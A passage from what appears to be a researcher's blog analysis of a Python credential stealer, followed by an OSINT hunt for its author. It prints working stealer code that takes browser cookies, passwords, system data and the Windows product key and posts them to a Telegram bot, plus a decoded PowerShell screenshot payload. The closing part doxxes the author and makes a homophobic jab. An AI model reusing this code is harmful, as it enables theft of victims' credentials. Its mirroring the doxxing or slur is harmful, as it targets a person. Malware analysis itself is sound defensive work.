os.makedirs(saveBrowserCookies, exist_ok=True)
os.makedirs(saveBrowserPasswords, exist_ok= True)
threads = []
for path in Paths.browserPaths:
if(ChoriumBrowsers.Check(path) == False):
continue
instace = ChoriumBrowsers(browserPath= path)
instace.GetCookies(saveBrowserCookies )
instace.GetPasswords(saveBrowserPasswords)
saveSystemInfo = savePath + "\\SystemInfomation.txt"
computerName = os.getenv("computername") or "Unable to get computer name"
computerOS = subprocess.run('wmic os get Caption', capture_output= True, shell= True).stdout.decode(errors= 'ignore').strip().splitlines()
computerOS = computerOS[2].strip() if len(computerOS) >= 2 else "Unable to detect OS"
totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', capture_output= True, shell= True).stdout.decode(errors= 'ignore').strip().split()
totalMemory = (str(int(int(totalMemory[1])/1000000000)) + " GB") if len(totalMemory) >= 1 else "Unable to detect total memory"
uuid = subprocess.run('wmic csproduct get uuid', capture_output= True, shell= True).stdout.decode(errors= 'ignore').strip().split()
uuid = uuid[1].strip() if len(uuid) >= 1 else "Unable to detect UUID"
cpu = subprocess.run("powershell Get-ItemPropertyValue -Path 'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name PROCESSOR_IDENTIFIER", capture_output= True, shell= True).stdout.decode(errors= 'ignore').strip() or "Unable to detect CPU"
gpu = subprocess.run("wmic path win32_VideoController get name", capture_output= True, shell= True).stdout.decode(errors= 'ignore').splitlines()
gpu = gpu[2].strip() if len(gpu) >= 2 else "Unable to detect GPU"
productKey = subprocess.run("powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault", capture_output= True, shell= True).stdout.decode(errors= 'ignore').strip() or "Unable to get product key"
info ="============================================================\n"
info+="###################### Kevin Grabber #############################\n"
info+=f"Name: {str(computerName)}\n"
info+=f"OS: {str(computerOS)}\n"
info+=f"CPU: {str(cpu)}\n"
info+=f"GPU: {str(gpu)}\n"
info+=f"RAM: {str(totalMemory)}\n"
info+=f"UUID: {str(uuid)}\n"
info+=f"Product Key: {str(productKey)}\n"
info+="============================================================\n"
with open (saveSystemInfo, "w") as f:
f.write(info)
f.close()
InfoLog.FileName = computerName
InfoLog.IP = requests.get("https://api.ipify.org?format=json").json()["ip"]
j = requests.get("https://ipinfo.io/json").json()
InfoLog.Country = j["region"] + " " +j["country"]
InfoLog.Date = datetime.today().strftime("%d-%m-%Y %H:%M:%S")
for t in threads:
t.join()
class InfoLog:
FileName: str
IP: str
Country: str
Date: str
if __name__ == "__main__" and os.name == "nt":
TempPath = ""
while True:
TempPath = os.path.join(os.getenv("temp"), Utility.GetRandomString(10))
if not os.path.isdir(TempPath):
break
#print(TempPath)
Paths.isRun = True
os.makedirs(TempPath)
# Steal(TempPath)
# InfoLog.StealFile(TempPath)
t1 = Thread(target=Steal, args={TempPath,})
#t2 = Thread(target=InfoLog.StealFile, args={TempPath,})
t1.start()
#t2.start()
t1.join()
#t2.join()
zipf = TempPath
shutil.make_archive(zipf, "zip", TempPath)
zipf = zipf + ".zip"
info = f"""<b>====== Bex Grabber Logs =======</b>
<b>==== PC Infomation ====</b>
Name: {InfoLog.FileName}
IP: {InfoLog.IP}
Country: {InfoLog.Country}
Date: {InfoLog.Date}
<b>==== Browser Data ====</b>
Cookies: {Counter.CookiesCount}
Passwords: {Counter.PasswordCount}
<b>==== Wallets ====</b>
"""
filename = f"{InfoLog.Country}-{InfoLog.IP}-{InfoLog.Date}"
files = {'document': (filename +".zip", open(zipf, 'rb'), 'text/plain')}
data = {'chat_id': TCHATID, 'caption': info , 'parse_mode': 'HTML'}
url = f'https://api.telegram.org/bot{TAPI}/sendDocument'
response = requests.post(url=url, files=files, data= data)
if(response.status_code == 200):
print("Done")
#os.removedirs(TempPath)
#os.remove(zipf)
exit(1)
else:
print(response.text)
pass
All functions are still very clear so far so I will skip describing their mechanisms, beside there’’s another payload encoded by base64:
def Steal(savePath: str):
os.chdir(savePath)
command = "JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" # Unicode encoded command
if subprocess.run(["powershell.exe", "-NoProfile", "-ExecutionPolicy", "Bypass", "-EncodedCommand", command], shell=True, capture_output=True, cwd= savePath + "\\").returncode == 0:
#print(1)
pass
Decode it, I got another payload:
$source = @"
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;
public class Screenshot
{
public static List<Bitmap> CaptureScreens()
{
var results = new List<Bitmap>();
var allScreens = Screen.AllScreens;
foreach (Screen screen in allScreens)
{
try
{
Rectangle bounds = screen.Bounds;
using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
{
using (Graphics graphics = Graphics.FromImage(bitmap))
{
graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
}
results.Add((Bitmap)bitmap.Clone());
}
}
catch (Exception)
{
// Handle any exceptions here
}
}
return results;
}
}
"@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
$screenshots = [Screenshot]::CaptureScreens()
for ($i = 0; $i -lt $screenshots.Count; $i++){
$screenshot = $screenshots[$i]
$screenshot.Save("./Display ($($i+1)).png")
$screenshot.Dispose()
}
- Class Definition: The class Screenshot is defined to encapsulate the screenshot capture logic.
- CaptureScreens Method: The method CaptureScreens returns a **List
**, which holds screenshots for all detected displays. The method iterates over **Screen.AllScreens** to get each connected monitor. - Screenshot Capture: For each screen, the script gets its bounds (dimensions and position). A new Bitmap object is created with the width and height of the screen. The Graphics.CopyFromScreen method captures the screen’s content and writes it into the Bitmap. The captured bitmap is cloned and added to the results list.
- Error Handling: The try-catch block ensures any exceptions during the capture process are handled gracefully, preventing the program from crashing.
- Return: After processing all screens, the method returns the list of screenshots.
Now let’s break down other parts:
- Embedding C# Code: The
$sourcevariable contains the C# code as a string. Add-Type is used to compile and add the C# code dynamically in PowerShell. The -ReferencedAssemblies option includes necessary libraries (System.Drawing and System.Windows.Forms) for working with graphics and windows. - Capturing Screenshots: The [Screenshot]::CaptureScreens() call invokes the static CaptureScreens method from the Screenshot class and stores the resulting Bitmap objects in the $screenshots variable.
- Saving Screenshots: The for loop iterates over each screenshot in the $screenshots list. Each screenshot is saved as a PNG file using the Save method. The file name is formatted as “Display (X).png”, where X is the display number. After saving, the Bitmap object is disposed of to free memory.
The script captures screenshots of all connected monitors and saves them as PNG files (named Display 1.png, Display 2.png, etc.) in the current directory. The Dispose method ensures that resources are cleaned up properly.
In summary, update.py will steal browser data; computer data: CPU, hardware, IP address,… and all data will be sent to Telegram bot:
These are all my progress when I analysed tool. Next I will find information about author. In the file they leave Telegram information:
Because he created this tool, it’s very clear that he should have Github, so I go to Github, use his username and search and I found his Github:
He attached many social media and in Facebook, I found a part of his face 😂😂😂:
I noticed that he left his email, with his email I searched and I found another his Github:
The funny thing here is he left Discord link 😂😂😂, that’s a big mistake for him:
The more thing is he had another group:
Access it and I found that group will store his tool, anyone wants to buy tool must go to that server:
With his username, I use sherlock to find him in other social media and this made me crazy 💀💀 (I’m sure he is g*y):
Moreover, he mentioned about 3 blog he always accesses and I found him at drcrypter.ru which contains many things related to malware…:
That’s all the things I can do till now. If there’s any news, I will update in the next article. Thank you very much for reading this post, if you have any question, please contact me directly on Facebook. See you in the next post, bye 🫀🫀🫀
all tags
AES Decrypt AKASEC BITSCTF BYUCTF Blue Team CTFtime Command and Control DES3 decrypt DFIR DUCTF Email forensic Forensic Git log HackTheBox ILSpy ImaginaryCTF JavaScript KCSC Macros Malware Memory Forensic MireaCTF Network Forensic OSCTF OSINT Powershell PyInstaller Python Real Case Redis Reverse Engineering Stealer TheCyberCoopCTF Threat Hunting TrueCrypt UIUCTF Vidar Virustotal Volatility WaniCTF WannaGame Wireshark Word Writeup dnSpy